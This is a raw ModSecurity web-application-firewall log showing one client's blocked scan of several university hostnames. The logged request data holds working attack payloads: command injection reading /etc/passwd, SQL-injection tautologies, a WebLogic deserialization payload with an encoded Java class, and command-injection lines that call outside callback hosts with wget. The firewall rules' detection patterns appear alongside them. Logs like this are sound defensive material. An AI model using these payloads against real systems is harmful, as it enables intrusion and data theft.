[Tue Aug 29 11:34:24.184983 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11UMCo-f0AAATVtQsAAAAZ"]
[Tue Aug 29 11:34:24.185691 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11UMCo-f0AAATWYP8AAAAa"]
[Tue Aug 29 11:34:25.199620 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11UcCo-f0AAATge50AAAAl"]
[Tue Aug 29 11:34:25.372555 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Rule 7fe1c6d9b840 [id "973347"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATXLJkAAAAb"]
[Tue Aug 29 11:34:25.383089 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Rule 7fe1c6d9b840 [id "973347"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATzVGMAAAAx"]
[Tue Aug 29 11:34:25.499206 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:,.*?[)\\\\da-f\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98][\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98](?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98].*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|\\\\Z|[^\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]+))|(?:\\\\Wselect.+\\\\W*?from)|((? ..." at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "209"] [id "981257"] [msg "Detects MySQL comment-/space-obfuscated injections and backtick termination"] [data "Matched Data: , \\x22method\\x22:  found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22 [hostname "ft.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATzVGYAAAAx"]
[Tue Aug 29 11:34:25.575519 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "pusatbahasa.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAAT2JPIAAAAz"]
[Tue Aug 29 11:34:25.612775 2023] [:error] [pid 1262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "journal.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATuszgAAAAv"]
[Tue Aug 29 11:34:25.640030 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Rule 7fe1c6d9b840 [id "973347"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATzVGwAAAAx"]
[Tue Aug 29 11:34:26.108943 2023] [:error] [pid 1258] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAATqf6kAAAAu"]
[Tue Aug 29 11:34:26.144840 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11UsCo-f0AAATxvWwAAAAw"]
[Tue Aug 29 11:34:26.205054 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAATxvW8AAAAw"]
[Tue Aug 29 11:34:26.232246 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAAT9PNkAAAA1"]
[Tue Aug 29 11:34:26.233796 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAAT@KtsAAAA2"]
[Tue Aug 29 11:34:26.244246 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAAUFdd0AAAA9"]
[Tue Aug 29 11:34:26.263188 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAAULx6oAAABD"]
[Tue Aug 29 11:34:26.335447 2023] [:error] [pid 1301] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUVDNIAAABL"]
[Tue Aug 29 11:34:26.336343 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUKg@wAAABC"]
[Tue Aug 29 11:34:26.355854 2023] [:error] [pid 1306] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgg8ie8pofoig68.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUa3A4AAABP"]
[Tue Aug 29 11:34:26.360320 2023] [:error] [pid 1249] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAThz-4AAAAm"]
[Tue Aug 29 11:34:26.367919 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlga49qe157i3mmj.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUOaSkAAABG"]
[Tue Aug 29 11:34:26.368555 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgstqycbr5ney6s.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUR82YAAABI"]
[Tue Aug 29 11:34:26.372026 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAT@KuAAAAA2"]
[Tue Aug 29 11:34:26.382575 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgnid48arom9n16.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUIz6EAAABA"]
